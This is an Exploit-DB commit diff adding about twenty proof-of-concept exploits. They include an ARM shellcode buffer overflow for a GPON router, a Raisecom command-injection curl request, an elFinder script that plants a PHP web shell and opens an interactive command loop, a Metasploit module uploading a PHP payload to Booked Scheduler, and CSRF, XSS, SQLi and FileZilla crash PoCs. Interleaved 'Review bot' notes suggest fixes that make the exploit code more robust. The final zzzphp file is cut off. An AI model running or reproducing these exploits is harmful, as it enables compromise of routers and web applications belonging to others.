DB: 2019-03-05

20 changes to exploits/shellcodes

Microsoft Edge Chakra 1.11.4 - Read Permission via Type Confusion

FileZilla 3.40.0 - 'Local search' / 'Local site' Denial of Service (PoC)

Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow

STOPzilla AntiMalware 6.5.2.59 - Privilege Escalation
STOPzilla AntiMalware 6.5.2.59 - Privilege Escalation (1)

STOPzilla AntiMalware 6.5.2.59 - Privilege Escalation (2)

symphony CMS 2.3 - Multiple Vulnerabilities
Symphony CMS 2.3 - Multiple Vulnerabilities

Mpay24 PrestaShop Payment Module 1.5 - Multiple Vulnerabilities

Raisecom XPON ISCOMHT803G-U_2.0.0_140521_R4.1.47.002 - Remote Code Execution

zzzphp CMS 1.6.1 - Cross-Site Request Forgery

Splunk Enterprise 7.2.4 - Custom App RCE (Persistent Backdoor - Custom Binary Payload)

Booked Scheduler 2.7.5 - Remote Command Execution (Metasploit)

OOP CMS BLOG 1.0 - Multiple SQL Injection

OOP CMS BLOG 1.0 - Multiple Cross-Site Request Forgery
CMSsite 1.0 - Multiple Cross-Site Request Forgery
elFinder 2.1.47 - Command Injection vulnerability in the PHP connector
MarcomCentral FusionPro VDP Creator < 10.0 - Directory Traversal
Bolt CMS 3.6.4 - Cross-Site Scripting
Craft CMS 3.1.12 Pro - Cross-Site Scripting
WordPress Plugin Cerber Security_ Antispam & Malware Scan 8.0 - Multiple Bypass Vulnerabilities
Fiberhome AN5506-04-F RP2669 - Persistent Cross-Site Scripting

Linux/x86 - NOT Encoder / Decoder - execve() /bin/sh Shellcode (44 bytes)

Linux/x64 - Kill All Processes Shellcode (11 bytes)

Linux/x86 - iptables -F Shellcode (43 bytes)
This commit is contained in:
Offensive Security 2019-03-05 05:01:50 +00:00
parent 3622d5285d
commit a37e3008e5
22 changed files with 2194 additions and 3 deletions

exploits/hardware/dos/46469.py Executable file

@ -0,0 +1,147 @@
#!/usr/bin/python3
import argparse
import requests
import urllib.parse
import binascii
import re
def run(target):
""" Execute exploitation """
# We're using CVE-2018-10561 and/or it's extension in order to exploit this
# Authenticated RCE in usb_Form method of GPON ONT. We can also exploit this
# issue after successful authentication: "useradmin" permission is enough
#
# IP Spoofing. Perspective option here too
#
# Step 1. Just a request to adjust stack for the exploit to work
#
# POST /GponForm/device_Form?script/ HTTP/1.1
# Host: 192.168.1.1
# User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0
# Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
# Accept-Language: en-US,en;q=0.5
# Accept-Encoding: gzip, deflate
# Referer: http://192.168.1.1/device.html
# Content-Type: application/x-www-form-urlencoded
# Content-Length: 55
# Connection: close
# Upgrade-Insecure-Requests: 1
#
# XWebPageName=device&admin_action=usb_enable&usbenable=1
headers = {'User-Agent':'Mozilla/5.0 (X11; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0',
'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language':'en-US,en;q=0.5', 'Accept-Encoding':'gzip, deflate',
'Referer':'http://192.168.1.1/device.html', 'Content-Type':'application/x-www-form-urlencoded',
'Connection': 'close', 'Upgrade-Insecure-Requests':'1', 'Cookie':'hibext_instdsigdipv2=1; _ga=GA1.1.1081495671.1538484678'}
payload = {'XWebPageName':'device', 'admin_action':'usb_enable', 'usbenable':1}
try:
requests.post(urllib.parse.urljoin(target, '/GponForm/device_Form?script/'), data=payload, verify=False, headers=headers, timeout=2)
except:
pass
# Step 2. Actual Exploitation
#
# POST /GponForm/usb_Form?script/ HTTP/1.1
# Host: 192.168.1.1
# User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0
# Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
# Accept-Language: en-US,en;q=0.5
# Accept-Encoding: gzip, deflate
# Referer: http://192.168.1.1/usb.html
# Content-Type: application/x-www-form-urlencoded
# Content-Length: 639
# Connection: close
# Upgrade-Insecure-Requests: 1
# XWebPageName=usb&ftpenable=0&url=ftp%3A%2F%2F&urlbody=&mode=ftp_anonymous&webdir=&port=21&clientusername=BBBBEBBBBDDDDBBBBBCCCCBBBBAAAABBBBAABBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAABBBBBBEEEBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&clientpassword=&ftpdir=&ftpdirname=undefined&clientaction=download&iptv_wan=2&mvlan=-1
# Weaponizing request:
# mov r8, r8 ; NOP for ARM Thumb
nop = "\xc0\x46"
# .section .text
# .global _start
#
# _start:
# .code 32
# add r3, pc, #1
# bx r3
#
# ; We've removed prev commands as processor is already in Thumb mode
#
# .code 16
# add r0, pc, #8
# eor r1, r1, r1
# eor r2, r2, r2
# strb r2, [r0, #10] ; Changing last char of command to \x00 in runtime
# mov r7, #11
# svc #1
# .ascii "/bin/tftpdX"
shellcode = "\x02\xa0\x49\x40\x52\x40\x82\x72\x0b\x27\x01\xdf\x2f\x62\x69\x6e\x2f\x74\x66\x74\x70\x64\x58"
# Overwritting only 3 bytes in order to get \x00 in 4th
pc = "\xe1\x8c\x03"
exploit = "A" + 197 * nop + shellcode + 26*"A" + pc
payload = {'XWebPageName':'usb', 'ftpenable':'0', 'url':'ftp%3A%2F%2F', 'urlbody':'', 'mode':'ftp_anonymous',
'webdir':'', 'port':21, 'clientusername':exploit, 'clientpassword':'', 'ftpdir':'',
'ftpdirname':'undefined', 'clientaction':'download', 'iptv_wan':'2', 'mvlan':'-1'}
headers = {'User-Agent':'Mozilla/5.0 (X11; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0',
'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language':'en-US,en;q=0.5', 'Accept-Encoding':'gzip, deflate',
'Referer':'http://192.168.1.1/usb.html', 'Content-Type':'application/x-www-form-urlencoded',
'Connection': 'close', 'Upgrade-Insecure-Requests':'1',
'Cookie':'hibext_instdsigdipv2=1; _ga=GA1.1.1081495671.1538484678'}
# Prevent requests from URL encoding
payload_str = "&".join("%s=%s" % (k,v) for k,v in payload.items())
try:
requests.post(urllib.parse.urljoin(target, '/GponForm/usb_Form?script/'), data=payload_str, headers=headers, verify=False, timeout=2)
except:
pass
print("The payload has been sent. Please check UDP 69 port of router for the tftpd service");
print("You can use something like: sudo nmap -sU -p 69 192.168.1.1");
def main():
""" Parse command line arguments and start exploit """
#
# Exploit should be executed after reboot. You can easily achive this in 3 ways:
# 1) Send some request to crash WebMgr (any DoS based on BoF). Router will be rebooted after that
# 2) Use CVE-2018-10561 to bypass authentication and trigger reboot from "device.html" page
# 3) Repeat this exploit at least twice ;)
# any of those will work!
#
parser = argparse.ArgumentParser(
add_help=False,
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog="Examples: %(prog)s -t http://192.168.1.1/")
# Adds arguments to help menu
parser.add_argument("-h", action="help", help="Print this help message then exit")
parser.add_argument("-t", dest="target", required="yes", help="Target URL address like: https://localhost:443/")
# Assigns the arguments to various variables
args = parser.parse_args()
run(args.target)
#
# Main
#
if __name__ == "__main__":
main()
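Review bot: The bare `except: pass` around each `requests.post` call (L93–L94 and L147–L148) swallows every error, including refused connections and timeouts, so the success message on L149 is printed whether or not anything was delivered; catch the library's base class and report it, e.g. `except requests.RequestException as exc: print(f"request failed: {exc}")`. On L166 `required="yes"` only works because argparse tests the value for truthiness; it should be `required=True`. `binascii` and `re` (L60–L61) are imported but never used, and the trailing semicolons on L149–L150 are not idiomatic Python. The hint on L150 hard-codes 192.168.1.1 while the target is taken from `-t`, so the two messages can disagree.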


@ -0,0 +1,19 @@
# Exploit Title: Remote code execution in Raisecom xpon
# Date: 03/03/2019
# Exploit Author: JameelNabbo
# Website: Ordina.nl
# Vendor Homepage: https://www.raisecom.com
# Software Link: https://www.raisecom.com/products/xpon
# Version: ISCOMHT803G-U_2.0.0_140521_R4.1.47.002
# Tested on: MacOSX
# CVE-2019-7385
POC:
curl -i -s -k -X 'POST' \
-H 'Origin: http://127.0.0.1&apos; -H -H 'Content-Type:
application/x-www-form-urlencoded' -H 'User-Agent: Chrome/7.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/65.0.3325.181 Safari/537.36' -H 'Referer: http://192.168.1.1/password.asp&apos; \
--data-binary
$'userMode=0&oldpass=netstat&newpass=`reboot`&confpass=`reboot`&submit-url=%2Fpassword.asp&save=Apply+Changes&csrf_token=current_cCSRF_ToKEN'
\
'http://192.168.1.1/boaform/formPasswordSetup&apos;


@ -0,0 +1,41 @@
# Exploit Title: Fiberhome AN5506-04-F - Stored Cross Site Scripting
# Date: 04.03.2019
# Exploit Author: Tauco
# Vendor Homepage: http://www.fiberhomegroup.com/en/
# Version: RP2669
# Tested on: Windows 10
# CVE : CVE-2019-9556
Description:
===========================================================================
Stored XSS occurs when a web application gathers input from a user which might be malicious, and then stores that input in a data store for later use. The input that is stored is not correctly filtered. As a consequence, the malicious data will appear to be part of the web site and run within the users browser under the privileges of the web application.
https://www.owasp.org/index.php/Testing_for_Stored_Cross_site_scripting_(OTG-INPVAL-002)
Proof of concept :
===========================================================================
1. Login with credential 192.168.1.1
2. Go to Management
3. Open User Account
4. Add user
5. Inject the post parameter "account_user"
6. Encode Url <script>alert("XSS")</script>
POST /goform/setUser HTTP/1.1
Host: 192.168.1.1
Content-Length: 101
Cache-Control: max-age=0
Origin: http://192.168.1.1
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.119 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://192.168.1.1/management/account_admin.asp
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: loginName=admin
Connection: close
account_user=%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%22%58%53%53%22%29%3c%2f%73%63%72%69%70%74%3e&account_pwd=password123&account_pwd2=password123&btnApply1=Apply&curIndex=new


@ -0,0 +1,56 @@
# Exploit Title: FileZilla 3.40.0 - "Local search" Denial of Service (PoC)
# Discovery by: Mr Winst0n
# Discovery Date: February 20, 2019
# Vendor Homepage: https://filezilla-project.org
# Software Link : https://filezilla-project.org/download.php?type=client&show_all=1
# Tested Version: 3.40.0
# Tested on: Kali linux x86_64
# Vulnerability Type: Denial of Service (DoS)
# Steps to Produce the Crash:
# 1.- Run python code : python filezilla.py
# 2.- Open buff.txt and copy content to clipboard
# 3.- Open Filezilla (located in bin folder), in top bar click on Binoculars icon (search for files recursively)
# 4.- In the opend window, Set Search type to "Local search"
# 5.- Paste ClipBoard on "Search directory" and click on "Search"
# 6.- Boom! Crashed...
#!/usr/bin/env python
buffer = "\x41" * 384
crash = "/" + buffer + "BBBB" + "CCCC"
f = open("buff.txt", "w")
f.write(crash)
f.close()
# Note: If you have not "/" before payload, you should add it to begining of payload, So the program recognizes it as a valid path.
# Exploit Title: FileZilla 3.40.0 - "Local site" Denial of Service (PoC)
# Discovery by: Mr Winst0n
# Discovery Date: February 25, 2019
# Vendor Homepage: https://filezilla-project.org
# Software Link : https://filezilla-project.org/download.php?type=client&show_all=1
# Tested Version: 3.40.0
# Tested on: Kali linux x86_64
# Vulnerability Type: Denial of Service (DoS)
# Steps to Produce the Crash:
# 1.- Run python code : python filezilla-2.py
# 2.- Open crash.txt and copy content to clipboard
# 3.- In "Local site" section paste clipboard and Enter.
# 4.- Boom! Crashed...
#!/usr/bin/env python
buffer = "\x41" * 384
crash = "/" + buffer + "BBBB" + "CCCC"
f = open("crash.txt", "w")
f.write(crash)
f.close()
# Note: If you have not "/" before payload, you should add it to begining of payload, So the program recognizes it as a valid path.
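Review bot: The file concatenates two near-identical scripts, so neither `#!/usr/bin/env python` line (L254 and L274) is on line 1 and neither is honoured as a shebang, and running the file executes both writers back to back, producing `buff.txt` and `crash.txt` in one go rather than the separate steps described on L248 and L270. The handle opened on L257 and L277 should be managed by a context manager, `with open("buff.txt", "w") as f: f.write(crash)`, which also drops the explicit `close()`. `buffer` shadows the Python 2 builtin of the same name; `filler` or `pad` would read more clearly. If the two PoCs are meant to run independently, splitting them into two files or choosing the output name from an argument would match the header instructions.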


@ -0,0 +1,149 @@
# Exploit Title: CMSsite 1.0 - Cross-Site Request Forgery (Delete Admin)
# Exploit Author: Mr Winst0n
# Author E-mail: manamtabeshekan[@]gmail[.]com
# Discovery Date: March 1, 2019
# Vendor Homepage: https://github.com/VictorAlagwu/CMSsite
# Software Link : https://github.com/VictorAlagwu/CMSsite/archive/master.zip
# Tested Version: 1.0
# Tested on: Kali linux, Windows 8.1
# PoC:
<!doctype html>
<html>
<head>
<title>Delete Admin</title>
</head>
<body>
<form method="post" action="http://localhost/[PATH]/admin/users.php?del=1">
<input type="submit" value="Delete">
</form>
</body>
</html>
# Exploit Title: CMSsite 1.0 - Cross-Site Request Forgery (Edit Admin)
# Exploit Author: Mr Winst0n
# Author E-mail: manamtabeshekan[@]gmail[.]com
# Discovery Date: March 1, 2019
# Vendor Homepage: https://github.com/VictorAlagwu/CMSsite
# Software Link : https://github.com/VictorAlagwu/CMSsite/archive/master.zip
# Tested Version: 1.0
# Tested on: Kali linux, Windows 8.1
# PoC:
<!doctype html>
<html>
<head>
<title>Edit Admin</title>
</head>
<body>
<form role="form" action="http://localhost/[PATH]/admin/users.php?source=edit_user&u_id=10" method="POST" enctype="multipart/form-data" >
<!-- You can change u_id value -->
<div class="form-group">
<label for="user_title">User Name</label>
<input type="text" name="user_name" required>
</div><br>
<div class="form-group">
<label for="user_author">FirstName</label>
<input type="text" name="user_firstname" required>
</div><br>
<div class="form-group">
<label for="user_status">LastName</label>
<input type="text" name="user_lastname" required>
</div><br>
<div class="input-group">
<select name="user_role" id="">
<label for="user_role">Role</label>
<option value='User'>Admin</option>
<option value='User'>User</option>
</select>
</div><br>
<div class="form-group">
<label for="post_image">User Image</label>
<input type="file" name="user_image">
</div><br>
<div class="form-group">
<label for="user_tag">Email</label>
<input type="email" name="user_email" class="form-control"required>
</div><br>
<div class="form-group">
<label for="user_tag">Password</label>
<input type="password" name="user_password" required>
</div><br>
<hr>
<button type="submit" name="update_user" value="Update User">Update User</button>
</form>
</body>
</html>
# Exploit Title: CMSsite 1.0 - Cross-Site Request Forgery (Add Admin)
# Exploit Author: Mr Winst0n
# Author E-mail: manamtabeshekan[@]gmail[.]com
# Discovery Date: March 1, 2019
# Vendor Homepage: https://github.com/VictorAlagwu/CMSsite
# Software Link : https://github.com/VictorAlagwu/CMSsite/archive/master.zip
# Tested Version: 1.0
# Tested on: Kali linux, Windows 8.1
# PoC:
<html>
<head>
<title>Add Admin</title>
</head>
<body>
<form role="form" action="http://localhost/[PATH]/admin/users.php?source=add_user" method="POST" enctype="multipart/form-data">
<div class="form-group">
<label for="user_title">User Name</label>
<input type="text" name="user_name" required><br><br>
</div>
<div class="form-group">
<label for="user_author">FirstName</label>
<input type="text" name="user_firstname" required><br><br>
</div>
<div class="form-group">
<label for="user_status">LastName</label>
<input type="text" name="user_lastname" required><br><br>
</div>
<div class="form-group">
<label for="user_image">Image</label>
<input type="file" name="user_image" required><br><br>
</div>
<div class="input-group">
<select name="user_role" id="">
<label for="user_role">Role</label>
<option value='Admin'>Admin</option><option value='User'>User</option>
</select><br><br>
</div>
<div class="form-group">
<label for="user_tag">Email</label>
<input type="email" name="user_email" required><br><br>
</div>
<div class="form-group">
<label for="user_tag">Password</label>
<input type="password" name="user_password" required><br><br>
</div>
<button type="submit" name="create_user" value="Add User">Add User</button>
</form>
</body>
</html>
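Review bot: In the Edit Admin form both `<option>` elements on L337–L338 carry `value='User'`, so the option labelled Admin submits the User value; the Add Admin form on L392 uses `value='Admin'` for the same choice and the two forms should agree. The `for` attributes on the labels (`user_title`, `user_author`, `user_status`, `user_tag`) do not match any element id and the `<select>` elements on L335 and L390 have an empty `id=""`; either drop the `for`/`id` attributes or give the inputs matching ids. A `<label>` nested directly inside `<select>` on L336 and L391 is not valid content for that element and browsers will discard it.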

exploits/php/webapps/46481.py Executable file

@ -0,0 +1,107 @@
#!/usr/bin/python
'''
# Exploit Title: elFinder <= 2.1.47 - Command Injection vulnerability in the PHP connector.
# Date: 26/02/2019
# Exploit Author: @q3rv0
# Vulnerability reported by: Thomas Chauchefoin
# Google Dork: intitle:"elFinder 2.1.x"
# Vendor Homepage: https://studio-42.github.io/elFinder/
# Software Link: https://github.com/Studio-42/elFinder/archive/2.1.47.tar.gz
# Version: <= 2.1.47
# Tested on: Linux 64bit + Python2.7
# PoC: https://www.secsignal.org/news/cve-2019-9194-triggering-and-exploiting-a-1-day-vulnerability/
# CVE: CVE-2019-9194
# Usage: python exploit.py [URL]
'''
import requests
import json
import sys
payload = 'SecSignal.jpg;echo 3c3f7068702073797374656d28245f4745545b2263225d293b203f3e0a | xxd -r -p > SecSignal.php;echo SecSignal.jpg'
def usage():
if len(sys.argv) != 2:
print "Usage: python exploit.py [URL]"
sys.exit(0)
def upload(url, payload):
files = {'upload[]': (payload, open('SecSignal.jpg', 'rb'))}
data = {"reqid" : "1693222c439f4", "cmd" : "upload", "target" : "l1_Lw", "mtime[]" : "1497726174"}
r = requests.post("%s/php/connector.minimal.php" % url, files=files, data=data)
j = json.loads(r.text)
return j['added'][0]['hash']
def imgRotate(url, hash):
r = requests.get("%s/php/connector.minimal.php?target=%s&width=539&height=960&degree=180&quality=100&bg=&mode=rotate&cmd=resize&reqid=169323550af10c" % (url, hash))
return r.text
def shell(url):
r = requests.get("%s/php/SecSignal.php" % url)
if r.status_code == 200:
print "[+] Pwned! :)"
print "[+] Getting the shell..."
while 1:
try:
input = raw_input("$ ")
r = requests.get("%s/php/SecSignal.php?c=%s" % (url, input))
print r.text
except KeyboardInterrupt:
sys.exit("\nBye kaker!")
else:
print "[*] The site seems not to be vulnerable :("
def main():
usage()
url = sys.argv[1]
print "[*] Uploading the malicious image..."
hash = upload(url, payload)
print "[*] Running the payload..."
imgRotate(url, hash)
shell(url)
if __name__ == "__main__":
main()
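Review bot: `hash` (L442, L463) and `input` (L452) shadow Python builtins; `file_hash` and `cmd` would avoid the confusion, especially since `hash` is also the name of the JSON field read on L441. The image handle opened inline on L437 is never closed, and the script silently depends on a `SecSignal.jpg` existing in the working directory, which neither the `# Usage:` header on L426 nor `usage()` on L432 mentions; open it with `with open('SecSignal.jpg', 'rb') as img:` and move the `requests.post` call inside the block, or at least document the prerequisite. `usage()` only validates the argument count, so a missing file or a non-JSON response on L440 surfaces as a traceback rather than a message.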


@ -0,0 +1,22 @@
# Exploit Title: OOP CMS BLOG 1.0 - SQL Injection
# Exploit Author: Mr Winst0n
# Author E-mail: manamtabeshekan[@]gmail[.]com
# Discovery Date: March 1, 2019
# Vendor Homepage: http://zsoft.com.bd/
# Software Link : https://datapacket.dl.sourceforge.net/project/php-oop-cms-blog/blog_fo_rup.zip
# Tested Version: 1.0
# Tested on: Kali linux, Windows 8.1
# PoC:
# Multiple files are vulnerable:
# http://localhost/[PATH]/search.php?search=1 [SQLi]&submit=Search
# http://localhost/[PATH]/post.php?id=17 [SQLi]
# http://localhost/[PATH]/posts.php?id=4 [SQLi]
# http://localhost/[PATH]/page.php?pageid=8 [SQLi]
# http://localhost/[PATH]/admin/viewUser.php?userid=34 [SQLi]
# http://localhost/[PATH]/admin/replayMsg.php?msgid=4 [SQLi]
# Note: Above *id values are random.


@ -0,0 +1,175 @@
# Exploit Title: OOP CMS BLOG 1.0 - Cross-Site Request Forgery (Delete Admin)
# Exploit Author: Mr Winst0n
# Author E-mail: manamtabeshekan[@]gmail[.]com
# Discovery Date: March 1, 2019
# Vendor Homepage: http://zsoft.com.bd/
# Software Link : https://datapacket.dl.sourceforge.net/project/php-oop-cms-blog/blog_fo_rup.zip
# Tested Version: 1.0
# Tested on: Kali linux, Windows 8.1
# PoC:
<html>
<body>
<form method="post" action="http://localhost/[PATH]/admin/userList.php?delUser=34">
<input type="submit" value="Delete">
</form>
</body>
</html>
# Exploit Title: OOP CMS BLOG 1.0 - Cross-Site Request Forgery (Update Site Title and Description)
# Exploit Author: Mr Winst0n
# Author E-mail: manamtabeshekan[@]gmail[.]com
# Discovery Date: March 1, 2019
# Vendor Homepage: http://zsoft.com.bd/
# Software Link : https://datapacket.dl.sourceforge.net/project/php-oop-cms-blog/blog_fo_rup.zip
# Tested Version: 1.0
# Tested on: Kali linux, Windows 8.1
# PoC:
<html>
<body>
<form method="post" action="http://localhost/[PATH]/admin/titleslogan.php" enctype="multipart/form-data">
<table class="form">
<tr>
<td>
<label>Website Title</label>
</td>
<td>
<input type="text" name="title">
</td>
</tr>
<tr>
<td>
<label>Website Slogan</label>
</td>
<td>
<input type="text" name="slogan">
</td>
</tr>
<tr>
<td>
<label>Upload Logo</label>
</td>
<td>
<input type="file" name="logo"/>
</td>
</tr>
<tr>
<td>
</td>
<td>
<input type="submit" name="submit" Value="Update" />
</td>
</tr>
</form>
</body>
</html>
# Exploit Title: OOP CMS BLOG 1.0 - Cross-Site Request Forgery (Add Post)
# Exploit Author: Mr Winst0n
# Author E-mail: manamtabeshekan[@]gmail[.]com
# Discovery Date: March 1, 2019
# Vendor Homepage: http://zsoft.com.bd/
# Software Link : https://datapacket.dl.sourceforge.net/project/php-oop-cms-blog/blog_fo_rup.zip
# Tested Version: 1.0
# Tested on: Kali linux, Windows 8.1
# PoC:
<html>
<body>
<form action="http://localhost/[PATH]/admin/addpost.php" method="post" enctype="multipart/form-data">
<table class="form">
<tr>
<td>
<label>Title</label>
</td>
<td>
<input type="text" name="title" placeholder="Enter Post Title...">
</td>
</tr>
<tr>
<td>
<label>Category</label>
</td>
<td>
<select id="select" name="cat">
<option value="1">Select Category</option>
<option value="19">mr. customer</option>
<option value="2">php</option>
<option value="3">HTML</option>
<option value="4">CSS</option>
<option value="17">c++</option>
<option value="7">java ajax</option>
<option value="20">mr. customer</option>
<option value="18">ajax</option>
</select>
</td>
</tr>
<tr>
<td>
<label>Upload Image</label>
</td>
<td>
<input type="file" name="image"/>
</td>
</tr>
<tr>
<td style="vertical-align: top; padding-top: 9px;">
<label>Content</label>
</td>
<td>
<textarea class="tinymce" name="body"></textarea>
</td>
</tr>
<tr>
<td>
<label>Tags</label>
</td>
<td>
<input type="text" name="tags" placeholder="Enter Tags...">
</td>
</tr>
<tr>
<td>
<label>Authors</label>
</td>
<td>
<input type="text" name="authour" value="admin">
<input type="hidden" name="user_id" value="29">
</td>
</tr>
<tr>
<td>
</td>
<td>
<input type="submit" name="submit" Value="Save" />
</td>
</tr>
</table>
</form>
</body>
</html>
# Note: Many other sections are vulnerable to CSRF, too.
# For example: Delete Post, Add Slider, ...
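Review bot: The `<table class="form">` opened on L522 is never closed — the form ends on L554 with `</form>` directly after `</tr>`; add `</table>` before `</form>`, as the Add Post form does on L636. `Value="Update"` on L551 and `Value="Save"` on L633 use a capitalised attribute name; HTML treats it case-insensitively, but lowercase `value` matches the rest of the markup. The hidden `user_id` on L626 and the category ids on L584–L592 appear to come from the author's test instance, which the note on L640 does not say.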

exploits/php/webapps/46486.rb Executable file

@ -0,0 +1,181 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize
super(
'Name' => 'Booked Scheduler v2.7.5 - Remote Command Execution',
'Description' => %q{
This module exploits a file upload vulnerability Booked 2.7.5.
In the "Look and Feel" section of the management panel, you can modify the Logo-Favico-CSS files.
Upload sections has file extension control except favicon part.
You can upload the file with the extension you want through the Favicon field.
The file you upload is written to the main directory of the site under the name "custom-favicon".
After upload the php payload to the main directory, Exploit executes payload and receives shell.
},
'Author' => [
'AkkuS <Özkan Mustafa Akkuş>', # Vulnerability Discovery, PoC & Msf Module
],
'License' => MSF_LICENSE,
'References' =>
[
['URL', 'https://pentest.com.tr/exploits/Booked-2-7-5-Remote-Command-Execution-Metasploit.html'],
],
'Platform' => ['php'],
'Arch' => ARCH_PHP,
'Targets' =>
[
['Booked Scheduler v2.7.5', {}]
],
'DisclosureDate' => '01 March 2019',
'Privileged' => false,
'DefaultTarget' => 0
)
register_options(
[
OptBool.new('SSL', [true, 'Use SSL', false]),
OptString.new('TARGETURI', [true, 'The base path to Booked', '/']),
OptString.new('USER', [true, 'User to login with', 'admin']),
OptString.new('PASS', [true, 'Password to login with', 'admin']),
], self.class)
end
##
# Check Exploit Vulnerable
##
def check
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri, "/Web/index.php")
})
if res and res.code == 200 and res.body =~ /v2.7.5/
return Exploit::CheckCode::Vulnerable
else
return Exploit::CheckCode::Safe
end
return res
end
##
# Exploit Portion
##
def exploit
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri, "/Web/index.php"),
'vars_post' => {
"email" => datastore['USER'],
"password" => datastore['PASS'],
"captcha" => "",
"resume" => "",
"language" => "en_us",
"login" => "submit"
}
})
if res and res.code == 302
print_status("Successful redirection to admin dashboard.")
else
return res
end
get_cookie = res.get_cookies
cookie = get_cookie
##
# Login Access Control
##
control = send_request_cgi({
'method' => 'GET',
'cookie' => cookie,
'uri' => normalize_uri(target_uri, "/Web/dashboard.php")
})
html = control.body
if html =~ /Dashboard/
print_good("Login successfuly")
else
print_status("User information is incorrect. Login failed")
exit 0
end
##
# Reading CSRF Token
##
csrf = send_request_cgi({
'method' => 'GET',
'cookie' => cookie,
'uri' => normalize_uri(target_uri, "/Web/admin/manage_theme.php")
})
html = control.body
if html =~ /Look and Feel/
token = csrf.body.split('CSRF_TOKEN" value=')[1].split(";")[0].split('/')[0].split('"')[1]
print_status("CSRF Token = #{token}")
else
print_status("User information is incorrect. Login failed")
exit 0
end
##
# Loading phase of the vulnerable file
##
boundary = Rex::Text.rand_text_alphanumeric(29)
data2 = "-----------------------------{boundary}"
data2 << "\r\nContent-Disposition: form-data; name=\"LOGO_FILE\"\r\n\r\n\r\n"
data2 << "-----------------------------{boundary}"
data2 << "\r\nContent-Disposition: form-data; name=\"FAVICON_FILE\"; filename=\"akkus.php\""
data2 << "\r\nContent-Type: text/html\r\n\r\n"
data2 << payload.encoded
data2 << "\n\r\n-----------------------------{boundary}"
data2 << "\r\nContent-Disposition: form-data; name=\"CSS_FILE\"\r\n\r\n\r\n"
data2 << "-----------------------------{boundary}"
data2 << "\r\nContent-Disposition: form-data; name=\"CSRF_TOKEN\"\r\n\r\n"
data2 << "#{token}"
data2 << "\r\n-----------------------------{boundary}--\r\n"
res = send_request_raw(
{
'method' => "POST",
'uri' => normalize_uri(target_uri, "/Web/admin/manage_theme.php?action=update"),
'data' => data2,
'headers' =>
{
'Content-Type' => 'multipart/form-data; boundary=---------------------------{boundary}',
},
'cookie' => cookie
})
if res and res.code == 200
print_good "Payload was successfully uploaded."
else
print_error "Upload failed."
return
end
##
# Command execution and shell retrieval
##
print_status("Attempting to execute the payload...")
command = payload.encoded
res = send_request_cgi(
{
'uri' => normalize_uri(target_uri, "/Web/custom-favicon.php"),
'cookie' => cookie
}, 25)
if res and res.code == 200
print_good "Payload executed successfully"
end
end
end
##
# End
##
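Review bot: `exit 0` on L743 and L759 terminates the whole framework process on a failed login instead of failing the module; the framework convention is `fail_with(Failure::NoAccess, 'Login failed')`, and the bare `return res` on L726 should fail the same way rather than returning silently. `return res` on L705 is unreachable because both branches of the preceding `if/else` already return. On L753 the "Look and Feel" check reads `control.body` (the dashboard response from L733) rather than `csrf.body`, the response it is meant to validate, and `command = payload.encoded` on L798 is assigned but never used. The random `boundary` from L764 is never interpolated: the strings on L765–L776 and L784 contain the literal text `{boundary}` rather than `#{boundary}`, so the header and body only match because both carry the same literal.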


@ -0,0 +1,79 @@
# Exploit Title: Cross-Site Request Forgery(CSRF) of zzzphp cms 1.6.1
# Google Dork: intext:"2015-2019 zzcms.com"
# Date: 26/02/2019
# Exploit Author: Yang Chenglong
# Vendor Homepage: http://www.zzzcms.com/index.html
# Software Link: http://115.29.55.18/zzzphp.zip
# Version: 1.6.1
# Tested on: windows/Linux,iis/apache
# CVE : CVE-2019-9082
Due to the absence of CSRF token in the request, attackers can forge the post request and insert malicious codes into the template file which leads to dynamic code evaluation.
Exploit:
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
